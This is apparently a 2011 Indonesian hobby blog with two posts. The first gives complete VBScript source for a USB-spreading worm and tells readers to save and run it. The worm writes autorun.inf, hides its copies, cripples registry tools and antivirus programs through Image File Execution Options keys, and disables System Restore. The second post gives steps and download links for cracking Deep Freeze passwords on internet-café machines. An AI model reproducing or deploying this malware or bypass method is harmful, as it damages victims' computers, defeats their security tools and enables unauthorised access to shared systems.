Total Tayangan Laman

Kamis, 21 Juli 2011

Sabtu, 09 Juli 2011

CARA BUAT VIRUS MUDAH

Sekarang silahkan copy paste code dibawah ini:

On error resume next

Dim dini,Arip,i,loph,you,mf,isi,tf,Dhanelovearip,nt,check,sd

lol=msgbox ("WARNING !!!  ARIP menginfeksi keseluruh Computer Segeralah Sholat ")

Isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe Dhanelovearip.vbs"

Set you = createobject("scripting.filesystemobject")

Set mf = you.getfile(wscript.scriptfullname)

Dim text,size

Size = mf.size

Check = mf.drive.drivetype

Set text = mf.openastextstream(1,-2)

Do while not text.atendofstream

Dini = dini & text.readline

Dini = dini & vbcrlf

Loop

Do

Set i = you.getspecialfolder(0)

Set arip = you.getspecialfolder(1)

Set tf = you.getfile(arip & "\Dhanelovearip.vbs")

Tf.attributes = 32

Set tf = you.createtextfile(arip & "\Dhanelovearip",2,true)

Tf.write dini

Tf.close

Set tf = you.getfile(arip & "\Dhanelovearip.vbs")

Tf.attributes = 39


For each loph in you.drives

If (loph.drivetype = 1 or loph.drivetype = 2) and loph.path <> "a:" then

Set tf=you.getfile(loph.path &"\Dhanelovearip.sys.vbs")

Tf.attributes =32

Set tf=you.createtextfile(loph.path &"\Dhanelovearip.vbs",2,true)

Tf.write dini

Tf.close

Set tf=you.getfile(loph.path &"\Dhanelovearip.vbs")

Tf.attributes = 39

Set tf =you.getfile(loph.path &"\autorun.inf")

Tf.attributes = 32

Set tf=you.createtextfile(loph.path &"\autorun.inf",2,true)

Tf.write isi

Tf.close

Set tf = you.getfile(loph.path &"\autorun.inf")

Tf.attributes=39

End if

Next

Set Dhanelovearip = createobject("wscript.shell")


Dhanelovearip.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\msconfig.exe\debugger",""

Dhanelovearip.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\regedit.exe\debugger",""

Dhanelovearip.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\regedt32.exe\debugger",""

Dhanelovearip.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\registryeditor.exe\debugger",""

Dhanelovearip.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\setup.exe\debugger",""

Dhanelovearip.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\avscan.exe\debugger",""

Dhanelovearip.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\SM?RTP.exe\debugger",""

Dhanelovearip.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\avcenter.exe\debugger",""

Dhanelovearip.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\ashavast.exe\debugger",""

Dhanelovearip.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\ansav.exe\debugger",""

Dhanelovearip.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\viremoval.exe\debugger",""

Dhanelovearip.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\viremover.exe\debugger",""

Dhanelovearip.regwrite "hkey_local_machine\software\microsoft\windows nt\currentversion\image file execution options\pcmav-cln.exe.exe\debugger",""

Dhanelovearip.regwrite "hkey_local_machine\software\microsoft\windows\currentversion\winlogon\legalnoticecaption", "my loph dini"

Dhanelovearip.regwrite "hkey_local_machine\software\policies\microsoft\windows\installer\limitsystemrestorecheckpointing", "1", "reg_dword"

Dhanelovearip.regwrite "hkey_local_machine\software\policies\microsoft\windows\installer\disablemsi", "1", "reg_dword"

Dhanelovearip.regwrite "hkey_local_machine\software\policies\microsoft\windows nt\systemrestore\disablesr", "1", "reg_dword"

Dhanelovearip.regwrite "hkey_local_machine\software\policies\microsoft\windows nt\systemrestore\disableconfig", "1", "reg_dword"

If check <> 1 then

Wscript.sleep 200000

End if

Loop while check <> 1

Set sd = createobject("wscript.shell")

Sd.run i & "\explorer.exe /e,/select, " & wscript.scriptfullname
Ni virus sangat ampuh banget, tapi saying udah kedetect ama AV local kayak smadav, tapi kalau AV inter gak bakal detect,,,,,,,, simpan dengan extensi .vbs GOOD LUCK……….???

atau download software dsni ;  http://www.4shared.com/file/sSAzzrdm/SyaRiEfVirus_Maker_v31.html

Minggu, 03 Juli 2011

cara hack deep freeze


Oke coy sekarang aku akan kasih tau cara Hack Deep Freeze yang sering digunain di Warnet, belajarlah buat jadi hacker kelas teri hehehe,
Sebenarnya kita bisa kok pake undeep freeze buat matiin tu DF, tapi sebelumnya kita juga harus tau DF seri brapa yang di gunain soalnya gak semua Undep freeze bias digunain untuk satu DF,
Sekarang aku kasih tau ya untuk hack deep freeze v4-v6 standard dan deep freeze v6 standard Evalution bias  pake undeep freeze V0.1 .
CARANYA:   mudah kok kita centang tu deep freeze brapa yang digunain lalu di apply,kalau udah di taskbar pojok kanan terlihat 1 icon baru kan itu adalah icon dari ADF, jadi totalnya ada 2 icon DF, kita buka tu icon dari ADF shift+click 2x (icon DF) masukin deh password suka2 kita tinggal di thawed deh, selamat kamu udah berhasil hack tu DF
Ada lagi sih pake Pasword remover ADF tapi itu hanya bisa digunain oleh deep freeze v4-v6 standard dan deep freeze v6 standard Evalution,
CARANYA: malah lebih mudah gak beda sama tu ADF diatas kita tinggal click REMOVE, nah tinggal kita Shift+click 2x icon DF kita masukin paswrd baru suka2 kita,thawed deh berhasil,
                Nah ini yang agak susah coy tapi akhirnya ketemu dan aku bisa edit sedikit ni software, CARA   Hack Deep freeze v6 full key,kita GAK  bisa lo pake ADF diatas,jadi gimana dong caranya,mudah kok coy download aja software ADF atare 0.4, caranya mas caranya, sabar dong ndes,
CARANYA:  Buka tu ADF atare 0.4 nah di bypassing method ada 2 pilihan centang kan, pilih aja open new proses lalu start tunggu beberapa detik lihat hasilnya,gak beda kok prosesnya sama diatas,disitu akan tampil  2 Icon DF pilih icon yang baru, Shift+click 2x masukin password baru suka2 kamu thawed deh, selamat DF full key bisa kita bobol coy,
Selamat mencoba.kalau gak bias  coment aja and kasih tau seri brapa tu DF Contohnya : DF v6 10.020.1616
NB: maaf ni tutorial Cuma buat pembelajaran aja jangan disalah gunakan di warnet atau pihak2 tertentu kasian coy mereka yang cari duit,susah tau…..salam hacker

 Download aja softwarenya disini
1.   http://www.4shared.com/file/8pjtd432/ADF_By_sarif_01.html
2.   http://www.4shared.com/file/QvDhe9eh/ADF_By_sarif_04_2.html